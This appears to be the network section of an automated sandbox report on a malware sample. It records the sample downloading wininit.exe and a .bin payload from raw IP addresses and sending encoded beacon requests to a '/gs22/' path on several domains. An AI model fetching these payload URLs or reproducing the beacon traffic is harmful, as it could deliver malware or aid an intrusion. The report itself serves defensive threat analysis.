Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.mezcalrosario.com | CNAME mezcalrosario.com | 89.117.139.56 |
www.w2w37.com | 192.74.228.114 | |
www.swastiktradingkota.com | | |
www.appleidco.com | | |
- UDP Requests
GET 200 http://103.6.248.9/T018W/wininit.exe
REQUEST
GET /T018W/wininit.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: 103.6.248.9
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Date: Thu, 03 Aug 2023 01:23:01 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Wed, 02 Aug 2023 07:42:07 GMT
ETag: "50eb8-601ebccf6c2a9"
Accept-Ranges: bytes
Content-Length: 331448
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET 200 http://23.95.60.83/rft/PiNqnEquXXipiHilYV223.bin
REQUEST
GET /rft/PiNqnEquXXipiHilYV223.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Host: 23.95.60.83
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Thu, 03 Aug 2023 01:23:26 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Last-Modified: Wed, 02 Aug 2023 07:38:29 GMT
ETag: "2e440-601ebbff90f28"
Accept-Ranges: bytes
Content-Length: 189504
Content-Type: application/octet-stream
GET 301 http://www.mezcalrosario.com/gs22/?x4ahHtwP=9vqGyEwSjFJ65F5HfUu0nj0baUEVEMWVa2VMtqXoJwbLaSy1AFIaNUZVE0qALa569XCftmAp&9r=gdidSh0H
REQUEST
GET /gs22/?x4ahHtwP=9vqGyEwSjFJ65F5HfUu0nj0baUEVEMWVa2VMtqXoJwbLaSy1AFIaNUZVE0qALa569XCftmAp&9r=gdidSh0H HTTP/1.1
Host: www.mezcalrosario.com
Connection: close
RESPONSE
HTTP/1.1 301 Moved Permanently
Connection: close
content-type: text/html
content-length: 707
date: Thu, 03 Aug 2023 01:24:19 GMT
server: LiteSpeed
location: https://www.mezcalrosario.com/gs22/?x4ahHtwP=9vqGyEwSjFJ65F5HfUu0nj0baUEVEMWVa2VMtqXoJwbLaSy1AFIaNUZVE0qALa569XCftmAp&9r=gdidSh0H
platform: hostinger
content-security-policy: upgrade-insecure-requests
GET 0 http://www.w2w37.com/gs22/?x4ahHtwP=sxpFiT/QnuwqbREFEalc4xGkI+X15UMLgBOmnpWdTi7yXahnG8Uo0ChTsXgqiqTJ7vwSjSB2&9r=gdidSh0H
REQUEST
GET /gs22/?x4ahHtwP=sxpFiT/QnuwqbREFEalc4xGkI+X15UMLgBOmnpWdTi7yXahnG8Uo0ChTsXgqiqTJ7vwSjSB2&9r=gdidSh0H HTTP/1.1
Host: www.w2w37.com
Connection: close
RESPONSE
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 | |
192.168.56.101 | 164.124.101.2 | 3 | |
192.168.56.101 | 164.124.101.2 | 3 | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts